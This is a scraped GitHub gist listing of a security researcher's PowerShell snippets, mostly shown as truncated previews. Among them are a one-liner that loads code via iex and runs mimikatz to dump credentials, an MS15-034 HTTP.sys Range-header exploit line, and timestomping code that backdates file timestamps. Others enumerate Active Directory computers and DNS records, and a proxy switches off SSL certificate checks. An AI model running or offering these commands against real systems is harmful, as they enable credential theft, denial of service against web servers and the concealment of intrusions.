Skip to content

Instantly share code, notes, and snippets.

View gist:f24832d8b02288ab6532
$wc=new-object net.webclient
iex $im
invoke-mimikatz -DumpCreds
obscuresec / Get-AdDnsRecords
Last active Aug 27, 2016
View Get-AdDnsRecords
function Get-ADDNSRecords {
update of dns-dump.ps1 by Michael B. Smith
michael at smithcons dot com
[string]$zone = "$env:USERDNSDOMAIN",
[string]$dc = "$(($env:LOGONSERVER).trim('\'))"
View ms15-034.cmd
powershell -com {$wr=[Net.WebRequest]::Create('');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}
View gist:25e8a142eb08bf237799
function Set-MacAttribute {
Sets the modified, accessed and created (Mac) attributes for a file based on another file or input.
PowerSploit Function: Set-MacAttribute
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
obscuresec / psproxy.ps1
Created May 19, 2014
Simple but dirty Powershell web proxy
View psproxy.ps1
#simple and dirty proxy
$Up = "http://+:8000/"
$Hso = New-Object Net.HttpListener
$Wco = New-Object Net.Webclient
#ignore self-signed/invalid ssl certs
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True}
Foreach ($P in $Up) {$Hso.Prefixes.Add($P)}
View gist:bd30a8431ee4bc32f1cd
powershell.exe -com '([adsisearcher]'objectCategory=Computer').Findall() | ForEach {$}'
obscuresec / base64padding.ps1
Created Apr 15, 2015
Base64 Padding in PowerShell
View base64padding.ps1
# define and encode test data
$TestString = 'This is a test. A short test for encoding and padding.'
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString))
# insert random '='
$Length = $Encoded.Length
$RandomChar = 1..($Length - 3) | Get-Random
$Encoded = $Encoded.Insert($RandomChar,'=')
# strip out '='
View gist:7b0cf71d7a8dd5e7b54c
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
obscuresec / dirtywebserver.ps1
Created May 18, 2014
Dirty PowerShell Webserver
View dirtywebserver.ps1
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
$HRes.ContentLength64 = $Buf.Length